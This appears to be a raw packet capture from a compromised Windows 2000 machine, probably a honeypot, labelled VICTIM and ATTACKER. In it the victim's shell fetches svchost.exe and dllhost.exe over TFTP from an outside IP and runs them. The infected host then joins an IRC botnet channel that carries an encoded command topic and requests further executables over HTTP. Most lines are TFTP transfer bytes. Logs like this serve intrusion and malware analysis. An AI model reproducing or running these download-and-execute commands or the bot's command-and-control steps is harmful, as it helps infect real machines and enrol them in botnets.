VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: Transfer successful: 80384 bytes in 17 seconds, 4728 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: Transfer successful: 80384 bytes in 18 seconds, 4465 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: C:\\WINNT\\system32>
VICTIM: USER azaail azaail azaail :pdqqupazoxpbuyuv
VICTIM: NICK ZPAwngpA
ATTACKER: :hub.58784.com 001 ZPAwngpA :eduzz, ZPAwngpA!azaail@192.168.1.147:hub.58784.com 005 ZPAwngpA MAP KNOCK SAFELIST HCN MAXCHANNELS=80 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:hub.58784.com 005 ZPAwngpA WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=eduzz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:ZPAwngpA MODE ZPAwngpA :+iRp:ZPAwngpA!azaail@192.168.1.147 JOIN :#m:hub.58784.com 332 ZPAwngpA #m :=H/TLkYtD5MG+xqwVG94fLAkpjijkEX+wcZ9Q4u0g+sWPVSa4M0Bt/Gm8cxJFKVAsCTB2KVsLO3ai6es29B93LZlp78tyCvVOCzwlG9huWdtOHzmoPj5mSancF/htUPhFjpOfdrYDEIq1/XOLRnqfxZgszykRT6vLpSoqn8YVONsZ2AIZL0zxO4piwh6O3h9yUSjDatwLoI07pD5:hub.58784.com 333 ZPAwngpA #m r23311 1243478132:hub.58784.com 353 ZPAwngpA @ #m :ZPAwngpA :hub.58784.com 366 ZPAwngpA #m :End of /NAMES list.
VICTIM: MODE ZPAwngpA +xi
VICTIM: JOIN #las6 USERHOST ZPAwngpAMODE #m +smntu
VICTIM: GET /gg2.exe HTTP/1.0Host: zone2tech.info
ATTACKER: GET /wsws.exe HTTP/1.0Host: zone2tech.info
ATTACKER: :ZPAwngpA!azaail@192.168.1.147 JOIN :#las6:hub.58784.com 353 ZPAwngpA @ #las6 :ZPAwngpA :hub.58784.com 366 ZPAwngpA #las6 :End of /NAMES list.:hub.58784.com 302 ZPAwngpA :ZPAwngpA=+azaail@192.168.1.147 :hub.58784.com 482 ZPAwngpA #m :You're not channel operator
VICTIM: MODE #las6 +smntu
ATTACKER: :hub.58784.com 482 ZPAwngpA #las6 :You're not channel operator